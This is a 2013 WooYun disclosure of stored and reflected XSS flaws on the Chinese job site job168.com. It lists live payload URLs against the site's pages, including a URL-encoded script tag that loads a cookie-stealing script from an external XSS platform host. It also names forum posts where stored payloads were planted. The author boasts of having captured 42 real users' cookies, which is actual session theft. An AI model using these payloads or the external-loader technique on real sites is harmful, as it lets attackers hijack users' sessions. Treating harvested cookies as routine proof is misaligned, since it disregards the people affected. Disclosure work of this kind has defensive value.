当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038051

漏洞标题:南方人才网的存储型xss漏洞

相关厂商:南方人才网

漏洞作者: Mosuan

提交时间:2013-09-25 14:39

修复时间:2013-11-09 14:39

公开时间:2013-11-09 14:39

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

南方人才网的xss问题,有储存型有反射型,打到40多条cookie

详细说明:

我都想不明白,这个站点我是在www.hao123.com的页面看到的,广告你都打到哪里了,怎么这么低级的漏洞都存在,几处反射型的xss跟存储型的xss,由于过了好久了,今天去xss平台才看到的,他们管理员好懒,都快半个月了才审核出来。。

漏洞证明:

3.jpg

1.jpg

2.jpg

xss.jpg

xss.jpg

xss2.jpg


====================================================================
http://www.job168.com/df/index.jsp?title=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD<script>alert('hello by Mosuan')</script>
http://www.job168.com/train/ask.jsp?unit_no=3484202&course_no=3318902&course_name= unit_no=3484202<script>alert('hello by Mosuan')</script>
http://www.job168.com/df/index.jsp?title=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73%73%2E%74%77%2F%34%30%32%34%3E%3C%2F%73%63%72%69%70%74%3E
http://bbs.job168.com/bbs/article/read.jsp?listid=24758帖子
http://bbs.job168.com/bbs/article/read.jsp?listid=24601 评论
打到40多条cookies

42条cookie.jpg

<

修复方案:

过滤。

版权声明:转载请注明来源 Mosuan@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝